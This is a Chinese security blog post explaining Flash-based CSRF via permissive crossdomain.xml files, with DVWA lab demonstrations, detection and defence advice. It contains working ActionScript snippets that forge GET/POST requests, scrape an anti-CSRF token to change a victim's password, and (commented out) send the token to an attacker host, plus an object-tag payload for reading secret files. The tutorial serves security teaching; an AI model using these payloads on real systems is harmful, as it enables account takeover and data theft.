
<!DOCTYPE html>
<html lang="zh-CN">


<head><meta name="generator" content="Hexo 3.9.0">
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1.0, user-scalable=no">
  <meta name="theme-color" content="#202020">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  <script src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js" async></script>
  
  
    <meta name="keywords" content="Web安全,CSRF,Flash,">
  

  
    <meta name="description" content="d2VsY29tZSB0byBteSBibG9n">
  
  
  
  <link rel="icon" type="image/x-icon" href="/1.jpg">
  
  <title>Flash型CSRF总结 [ Mi1k7ea ]</title>
  
    <!-- stylesheets list from config.yml -->
    
      <link rel="stylesheet" href="//cdn.bootcss.com/pure/1.0.0/pure-min.css">
    
      <link rel="stylesheet" href="/css/xoxo.css">
    
  
</head>


<body>
  <div class="nav-container">
    <nav class="home-menu pure-menu pure-menu-horizontal">
  <a class="pure-menu-heading" href="/">
    
    <span class="title" style="text-transform:none">Mi1k7ea</span>
  </a>

  <ul class="pure-menu-list clearfix">
      
          
            
              <li class="pure-menu-item"><a href="/archives" class="pure-menu-link">归档</a></li>
            
          
      
          
            
              <li class="pure-menu-item"><a href="/about" class="pure-menu-link">关于</a></li>
            
          
      
  </ul>
   
</nav>

  </div>

  <div class="container" id="content-outer">
    <div class="inner" id="content-inner">
      <div class="post-container">
  <article class="post" id="post">
    <header class="post-header text-center">
      <h1 class="title">
        Flash型CSRF总结
      </h1>
      <span>
        
        <time class="time" datetime="2019-07-28T06:45:15.000Z">
        2019-07-28
      </time>
        
      </span>
      <span class="slash">/</span>
      <span class="post-meta">
      <span class="post-tags">
        <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/CSRF/">CSRF</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Flash/">Flash</a></li><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/Web安全/">Web安全</a></li></ul>
      </span>
    </span>
      <!--<span class="slash">/</span>
      <span class="read">
      <span id="busuanzi_value_page_pv"></span> 点击
    </span>
      <span class="slash">/</span>-->
    </header>

    <div class="post-content">
      <h2 id="0x01-基本原理"><a href="#0x01-基本原理" class="headerlink" title="0x01 基本原理"></a>0x01 基本原理</h2><p>Flash功能丰富，我们可以使用其API来向任意站点发送请求，而且发送的请求会继承当前浏览器的会话。换句话说，我们可以利用Flash而非JavaScript来控制浏览器向目标URL发送请求，从而实现Flash CSRF攻击。</p>
<p>我们知道，通过Flash请求外部资源时，会先访问外域是否存在crossdomain.xml且判断Flash当前域是否在allow-access-from标签配置的domain内。当domain的值为通配符*时，表明该站资源对所有外域开放，等同于舍弃了Flash层面的同源策略的限制。</p>
<p>Flash CSRF在于：如果目标站点的crossdomain.xml中domain值为*或者其中某些domain下的站可被攻击者利用来上传Flash文件等，那么攻击者可以诱使受害者用户访问攻击页面，进而通过触发Flash请求某个用户当前浏览器已登录的页面，从中提取出CSRF的token或者页面的其他敏感信息，造成CSRF攻击。</p>
<h2 id="0x02-攻击场景"><a href="#0x02-攻击场景" class="headerlink" title="0x02 攻击场景"></a>0x02 攻击场景</h2><p>使用Flash来发起CSRF攻击，一般用于绕过一些特定情形，下面就列两个常见的。</p>
<h3 id="场景1——绕过Referer等HTTP头字段检测"><a href="#场景1——绕过Referer等HTTP头字段检测" class="headerlink" title="场景1——绕过Referer等HTTP头字段检测"></a>场景1——绕过Referer等HTTP头字段检测</h3><p>很多时候，Web站点后台会对Referer字段进行校验，但是有时候会出现未校验无Referer字段等情况的缺陷。</p>
<p>用Flash发起的CSRF，可以去掉HTTP头中的Referer字段，从而可以绕过校验Referer字段（但未校验空Referer）来防御CSRF攻击的机制。除此之外，还能去掉Origin字段。</p>
<p>攻击原理和CSRF一样的，只不过从经典的伪造表单变成了触发swf文件的形式：</p>
<ol>
<li>攻击者编写恶意的Flash文件，用于从目标敏感页面中获取受害者的敏感信息或者获取页面的token值；</li>
<li>攻击者将该Flash文件上传至自己的服务器中，并诱使受害者访问加载该恶意Flash文件的页面；</li>
<li>受害者访问目标敏感页面后，在同一浏览器中被诱使访问攻击者服务器加载了恶意Flash文件的页面，此时的访问是会带上受害者在目标页面的会话的；</li>
<li>由于无Referer字段，Bypass了目标站点后台的CSRF防御机制，成功获取到页面token或用户敏感信息，实现了CSRF攻击；</li>
</ol>
<p>下面举两个不同方式的Demo。</p>
<h4 id="GET方式"><a href="#GET方式" class="headerlink" title="GET方式"></a>GET方式</h4><p>首先攻击者发现目标站点的crossdomain.xml存在Flash型CSRF风险：</p>
<figure class="highlight xml"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?xml version="1.0"?&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">cross-domain-policy</span>&gt;</span></span><br><span class="line"><span class="tag">&lt;<span class="name">allow-access-from</span> <span class="attr">domain</span>=<span class="string">"*"</span>/&gt;</span></span><br><span class="line"><span class="tag">&lt;/<span class="name">cross-domain-policy</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>然后攻击者编写恶意Flash，用于在目标页面进行危险敏感的GET操作：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">function CSRF():void</span><br><span class="line">&#123;</span><br><span class="line">	var urlLoader:URLLoader=new URLLoader();</span><br><span class="line">	var request:URLRequest=new URLRequest();</span><br><span class="line">	request.url=&quot;http://a.com/m7.php&quot;;</span><br><span class="line">	request.method=URLRequestMethod.GET;</span><br><span class="line">	request.data=&quot;user=admin&amp;msg=GET_secret_content&quot;;</span><br><span class="line">	urlLoader.load(request);</span><br><span class="line">	&#125;</span><br><span class="line">CSRF();</span><br></pre></td></tr></table></figure>
<p>编译为swf文件后放置到攻击者的Web目录，然后诱使受害者访问，即可向目标站点通过GET方式带上受害者当前访问该页面的浏览器会话来发送敏感操作的请求：</p>
<p><img src="/2019/07/28/Flash型CSRF总结/3.png" alt=""></p>
<p><img src="/2019/07/28/Flash型CSRF总结/1.png" alt=""></p>
<h4 id="POST方式"><a href="#POST方式" class="headerlink" title="POST方式"></a>POST方式</h4><figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br></pre></td><td class="code"><pre><span class="line">import flash.net.URLRequest;</span><br><span class="line">import flash.system.Security;</span><br><span class="line">var url = new URLRequest(&quot;http://a.com/m7.php&quot;);</span><br><span class="line">var shellcode = new URLVariables();</span><br><span class="line">shellcode = &quot;user=admin&amp;msg=POST_hacker_content&quot;;</span><br><span class="line">url.method = &quot;POST&quot;;</span><br><span class="line">url.data = shellcode;</span><br><span class="line">sendToURL(url);</span><br><span class="line">stop();</span><br></pre></td></tr></table></figure>
<p>诱使受害者访问攻击者的页面后，触发Flash向目标页面发起POST请求，进行危险的操作：</p>
<p><img src="/2019/07/28/Flash型CSRF总结/4.png" alt=""></p>
<p><img src="/2019/07/28/Flash型CSRF总结/2.png" alt=""></p>
<p>可以明显看到，请求报文并没有Referer字段。</p>
<h3 id="场景2——上传Flash到目标站点绕过crossdomain"><a href="#场景2——上传Flash到目标站点绕过crossdomain" class="headerlink" title="场景2——上传Flash到目标站点绕过crossdomain"></a>场景2——上传Flash到目标站点绕过crossdomain</h3><p>有个知识点——Flash并不关心扩展名或者Content-Type。如果使用object标签嵌入文件，只要文件内容为有效的Flash文件，它就会被当作是Flash文件来执行。</p>
<p>简单说下利用过程：</p>
<ol>
<li>攻击者发现目标站点的crossdomain.xml中domain设置并不为*，而是几个其他域名；</li>
<li>攻击者搜索几个白名单域名中的子域名，寻找可上传文件的域名，如victim.com中允许上传图片文件，但校验了文件后缀名和Content-Type；</li>
<li>攻击者创建恶意Flash文件，并修改后缀名为jpg，然后通过篡改Content-Type将其上传到victim.com中；</li>
<li>获取到上传文件的地址后，攻击者使用类型为application/x-shockwave-flash的object标签将文件嵌入到攻击者服务器中，如attacker.com；</li>
<li>受害者访问了victim.com，然后在同一浏览器中被诱使访问attacker.com，触发了攻击者上传的恶意Flash，从而可使攻击者窃取CSRF的token或目标站点页面的敏感信息，实现CSRF攻击；</li>
</ol>
<p>类似的payload如下：</p>
<figure class="highlight html"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="tag">&lt;<span class="name">object</span> <span class="attr">style</span> = <span class="string">"height ：1px ; width ：1px ; "</span> <span class="attr">data</span> = <span class="string">"http://victim.com/user/2292/profilepicture.jpg"</span> <span class="attr">type</span> = <span class="string">"application / x-shockwave-flash"</span> <span class="attr">allowscriptaccess</span> = <span class="string">"always"</span> <span class="attr">flashvars</span> = <span class="string">"c = read＆u = http://victim.com/secret_file.txt"</span> &gt;</span> <span class="tag">&lt;/<span class="name">object</span>&gt;</span></span><br></pre></td></tr></table></figure>
<p>实际攻击利用案例可直接看如下链接，该作者发现了Paypal的Flash CSRF漏洞并在YouTube上进行了漏洞利用的演示：</p>
<p><a href="https://blog.h3xstream.com/2015/04/crossdomainxml-beware-of-wildcards.html" target="_blank" rel="noopener">https://blog.h3xstream.com/2015/04/crossdomainxml-beware-of-wildcards.html</a></p>
<h2 id="0x03-攻击案例"><a href="#0x03-攻击案例" class="headerlink" title="0x03 攻击案例"></a>0x03 攻击案例</h2><p>下面以DVWA的Low级和High级的场景为例进行Flash CSRF的攻击利用。</p>
<h3 id="GET型无Anti-CSRF-token"><a href="#GET型无Anti-CSRF-token" class="headerlink" title="GET型无Anti-CSRF token"></a>GET型无Anti-CSRF token</h3><p>我们知道，Low级的场景非常简单，表单参数通过GET方式传入，无CSRF-token防御机制，也无校验当前密码：</p>
<p><img src="/2019/07/28/Flash型CSRF总结/5.png" alt=""></p>
<p>首先，我们查看到目标站点是存在crossdomain.xml文件的，且domain设置为*，明显存在Flash CSRF风险：</p>
<p><img src="/2019/07/28/Flash型CSRF总结/6.png" alt=""></p>
<p>接着，我们根据前面看到的表单将前面场景1中的GET方式的代码稍微改下即可：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">function CSRF():void</span><br><span class="line">&#123;</span><br><span class="line">	var urlLoader:URLLoader=new URLLoader();</span><br><span class="line">	var request:URLRequest=new URLRequest();</span><br><span class="line">	request.url=&quot;http://a.com/dvwa/vulnerabilities/csrf/index.php&quot;;</span><br><span class="line">	request.method=URLRequestMethod.GET;</span><br><span class="line">	request.data=&quot;password_new=hacker&amp;password_conf=hacker&amp;Change=Change&quot;;</span><br><span class="line">	urlLoader.load(request);</span><br><span class="line">	&#125;</span><br><span class="line">CSRF();</span><br></pre></td></tr></table></figure>
<p>编译成swf文件后，放置到我们自己的服务器中，然后诱使受害者访问我们的恶意swf文件；如果受害者在此之前在同一浏览器中登录了目标站点，那么就会成功触发Flash CSRF攻击，从而密码被篡改：</p>
<p><img src="/2019/07/28/Flash型CSRF总结/7.png" alt=""></p>
<p>这里看到，受害者被诱导访问我们服务器上的恶意swf文件后，Flash先向目标服务器访问请求是否存在crossdomain.xml且是否允许当前域访问，当OK后就发送GET方式的恶意表单请求篡改密码。这里注意到右侧的HTTP头字段，由Flash发起的请求会带上用户的会话，Referer为Flash文件所在的地址，同时会添加一个x-flash-version字段用于标志Flash版本信息。</p>
<p>我们发送恶意链接诱使受害者点击访问，自己大概估算个受害者点击访问的时间后，使用admin/hacker用户名密码即可登录成功。</p>
<h3 id="GET型含Anti-CSRF-token"><a href="#GET型含Anti-CSRF-token" class="headerlink" title="GET型含Anti-CSRF token"></a>GET型含Anti-CSRF token</h3><p>在前面的基础上，High级添加了Anti-CSRF token机制，即在修改密码的表单处添加了一项隐藏的token，当用户每次访问改密页面时，服务器会返回一个随机的token，向服务器发起请求时，需要提交token参数，而服务器在收到请求时，会优先检查token，只有token正确，才会处理客户端的请求：</p>
<p><img src="/2019/07/28/Flash型CSRF总结/8.png" alt=""></p>
<p>这时就比Low级多了一步，需要先获取当前表单页面的Anti-CSRF token值，再一起发送篡改密码的请求。</p>
<p>这里我们编写恶意swf文件，主要添加了先让受害者请求表单页面，将返回的响应内容通过正则表达式来匹配出此时Anti-CSRF token的值，然后添加上token参数一同发送GET方式表单请求篡改密码：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">//获取当前页面user_token</span><br><span class="line">var targetURL:String = &quot;http://192.168.43.201/dvwa/vulnerabilities/csrf/index.php&quot;;</span><br><span class="line">var request:URLRequest = new URLRequest(targetURL);</span><br><span class="line">request.method = URLRequestMethod.GET;</span><br><span class="line">request.data = &quot;&quot;;</span><br><span class="line">sendToURL(request);</span><br><span class="line">var loader:URLLoader=new URLLoader();</span><br><span class="line">loader.addEventListener(Event.COMPLETE,completeHandler);</span><br><span class="line">function completeHandler(event:Event):void&#123;</span><br><span class="line">var user_token:String = loader.data.match(&quot;user_token&apos; value=&apos;(.*?)&apos;&quot;)[1];</span><br><span class="line"></span><br><span class="line">//将token发回</span><br><span class="line">//var targetURL2:String = &quot;http://a.com/gettoken.php&quot;;</span><br><span class="line">//var request2:URLRequest = new URLRequest(targetURL2);</span><br><span class="line">//request2.method = URLRequestMethod.POST;</span><br><span class="line">//request2.data = &quot;user_token=&quot; + user_token;</span><br><span class="line">//sendToURL(request2);</span><br><span class="line"></span><br><span class="line">//发起CSRF攻击，篡改密码</span><br><span class="line">var request3:URLRequest = new URLRequest(targetURL);</span><br><span class="line">request3.method = URLRequestMethod.GET;</span><br><span class="line">request3.data = &quot;password_new=hacker&amp;password_conf=hacker&amp;Change=Change&amp;user_token=&quot; + user_token;</span><br><span class="line">sendToURL(request3);</span><br><span class="line">&#125;</span><br><span class="line">loader.load(request);</span><br></pre></td></tr></table></figure>
<p>和Low级一样的原理，不再累赘，看看效果。</p>
<p>当受害者访问的是low.swf文件时，该文件时不带token的，会修改失败，302重定向回之前的页面：</p>
<p><img src="/2019/07/28/Flash型CSRF总结/9.png" alt=""></p>
<p>当受害者访问的是high.swf文件时，带上了token参数，成功进行了密码的篡改：</p>
<p><img src="/2019/07/28/Flash型CSRF总结/10.png" alt=""></p>
<h2 id="0x04-检测方法"><a href="#0x04-检测方法" class="headerlink" title="0x04 检测方法"></a>0x04 检测方法</h2><p>检查网站的crossdomain.xml文件，如果allow-access-from标签中domain值设置为*则可能存在Flash CSRF漏洞；如果设置domain值为多个外域，需要人工分析是否存在风险。</p>
<h2 id="0x05-防御方法"><a href="#0x05-防御方法" class="headerlink" title="0x05 防御方法"></a>0x05 防御方法</h2><ul>
<li>当站点不需要跨域请求资源时，尽量删除crossdomain.xml文件；</li>
<li>若需crossdomain.xml文件，则必须严格设置allow-access-from标签中domain的白名单；</li>
</ul>
<h2 id="0x06-参考"><a href="#0x06-参考" class="headerlink" title="0x06 参考"></a>0x06 参考</h2><p><a href="https://labs.detectify.com/2014/05/20/the-lesser-known-pitfalls-of-allowing-file-uploads-on-your-website/" target="_blank" rel="noopener">The lesser known pitfalls of allowing file uploads on your website</a></p>
<p><a href="https://blog.h3xstream.com/2015/04/crossdomainxml-beware-of-wildcards.html" target="_blank" rel="noopener">crossdomain.xml : Beware of Wildcards</a></p>
<p><a href="http://www.vuln.cn/6205" target="_blank" rel="noopener">Flash CSRF – _Dy</a></p>

    </div>

  </article>
  <div class="toc-container">
    
  <div id="toc" class="toc-article">
    <strong class="toc-title">目录</strong>
    <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#0x01-基本原理"><span class="toc-text">0x01 基本原理</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x02-攻击场景"><span class="toc-text">0x02 攻击场景</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#场景1——绕过Referer等HTTP头字段检测"><span class="toc-text">场景1——绕过Referer等HTTP头字段检测</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#GET方式"><span class="toc-text">GET方式</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#POST方式"><span class="toc-text">POST方式</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#场景2——上传Flash到目标站点绕过crossdomain"><span class="toc-text">场景2——上传Flash到目标站点绕过crossdomain</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x03-攻击案例"><span class="toc-text">0x03 攻击案例</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#GET型无Anti-CSRF-token"><span class="toc-text">GET型无Anti-CSRF token</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#GET型含Anti-CSRF-token"><span class="toc-text">GET型含Anti-CSRF token</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x04-检测方法"><span class="toc-text">0x04 检测方法</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x05-防御方法"><span class="toc-text">0x05 防御方法</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#0x06-参考"><span class="toc-text">0x06 参考</span></a></li></ol>
  </div>


  </div>
</div>
<div class="copyright">
    <span>本作品采用</span>
    <a href="https://creativecommons.org/licenses/by/4.0/">知识共享署名 4.0 国际许可协议</a>
    <span>进行许可。 转载时请注明原文链接。</span>
</div>


  
    <div class="post-nav">
      <div class="post-nav-item post-nav-next">
        
          <span>〈 </span>
          <a href="/2019/07/21/Flash型XSS小结/" rel="next" title="Flash型XSS总结">
          Flash型XSS总结
          </a>
        
      </div>
  
      <div class="post-nav-item post-nav-prev">
          
          <a href="/2019/07/30/ZeroClipboard-swf的Flash型XSS分析/" rel="prev" title="ZeroClipboard.swf的Flash型XSS分析">
            ZeroClipboard.swf的Flash型XSS分析
          </a>
          <span>〉</span>
        
      </div>
    </div>
  


    </div>

    
    

  </div>
  <footer class="footer text-center">
    <div id="bottom-inner">
        <span>Copyright &copy; Mi1k7ea</span>  |  
        <span id="busuanzi_container_site_pv">总访问量 <span id="busuanzi_value_site_pv"></span></span> | 
        <span id="busuanzi_container_site_uv">访客 <span id="busuanzi_value_site_uv"></span></span>
    </div>
</footer>

  

<script>
  (function(window, document, undefined) {

    var timer = null;

    function returnTop() {
      cancelAnimationFrame(timer);
      timer = requestAnimationFrame(function fn() {
        var oTop = document.body.scrollTop || document.documentElement.scrollTop;
        if (oTop > 0) {
          document.body.scrollTop = document.documentElement.scrollTop = oTop - 50;
          timer = requestAnimationFrame(fn);
        } else {
          cancelAnimationFrame(timer);
        }
      });
    }

    var hearts = [];
    window.requestAnimationFrame = (function() {
      return window.requestAnimationFrame ||
        window.webkitRequestAnimationFrame ||
        window.mozRequestAnimationFrame ||
        window.oRequestAnimationFrame ||
        window.msRequestAnimationFrame ||
        function(callback) {
          setTimeout(callback, 1000 / 60);
        }
    })();
    init();

    function init() {
      css(".heart{z-index:9999;width: 10px;height: 10px;position: fixed;background: #f00;transform: rotate(45deg);-webkit-transform: rotate(45deg);-moz-transform: rotate(45deg);}.heart:after,.heart:before{content: '';width: inherit;height: inherit;background: inherit;border-radius: 50%;-webkit-border-radius: 50%;-moz-border-radius: 50%;position: absolute;}.heart:after{top: -5px;}.heart:before{left: -5px;}");
      attachEvent();
      gameloop();
      addMenuEvent();
    }

    function gameloop() {
      for (var i = 0; i < hearts.length; i++) {
        if (hearts[i].alpha <= 0) {
          document.body.removeChild(hearts[i].el);
          hearts.splice(i, 1);
          continue;
        }
        hearts[i].y--;
        hearts[i].scale += 0.004;
        hearts[i].alpha -= 0.013;
        hearts[i].el.style.cssText = "left:" + hearts[i].x + "px;top:" + hearts[i].y + "px;opacity:" + hearts[i].alpha + ";transform:scale(" + hearts[i].scale + "," + hearts[i].scale + ") rotate(45deg);background:" + hearts[i].color;
      }
      requestAnimationFrame(gameloop);
    }

    /**
     * 给logo设置点击事件
     * 
     * - 回到顶部
     * - 出现爱心
     */
    function attachEvent() {
      var old = typeof window.onclick === "function" && window.onclick;
      var logo = document.getElementById("logo");
      if (logo) {
        logo.onclick = function(event) {
          returnTop();
          old && old();
          createHeart(event);
        }
      }
      
    }

    function createHeart(event) {
      var d = document.createElement("div");
      d.className = "heart";
      hearts.push({
        el: d,
        x: event.clientX - 5,
        y: event.clientY - 5,
        scale: 1,
        alpha: 1,
        color: randomColor()
      });
      document.body.appendChild(d);
    }

    function css(css) {
      var style = document.createElement("style");
      style.type = "text/css";
      try {
        style.appendChild(document.createTextNode(css));
      } catch (ex) {
        style.styleSheet.cssText = css;
      }
      document.getElementsByTagName('head')[0].appendChild(style);
    }

    function randomColor() {
      // return "rgb(" + (~~(Math.random() * 255)) + "," + (~~(Math.random() * 255)) + "," + (~~(Math.random() * 255)) + ")";
      return "#F44336";
    }

    function addMenuEvent() {
      var menu = document.getElementById('menu-main-post');
      if (menu) {
        var toc = document.getElementById('toc');
        if (toc) {
          menu.onclick = function() {
            if (toc) {
              if (toc.style.display == 'block') {
                toc.style.display = 'none';
              } else {
                toc.style.display = 'block';
              }
            }
          };
        } else {
          menu.style.display = 'none';
        }
      }
    }

  })(window, document);
</script>

  



  
<script>
  (function(){
      var bp = document.createElement('script');
      var curProtocol = window.location.protocol.split(':')[0];
      if (curProtocol === 'https') {
          bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
      }
      else {
          bp.src = 'http://push.zhanzhang.baidu.com/push.js';
      }
      var s = document.getElementsByTagName("script")[0];
      s.parentNode.insertBefore(bp, s);
  })();
</script>


</body>
</html>
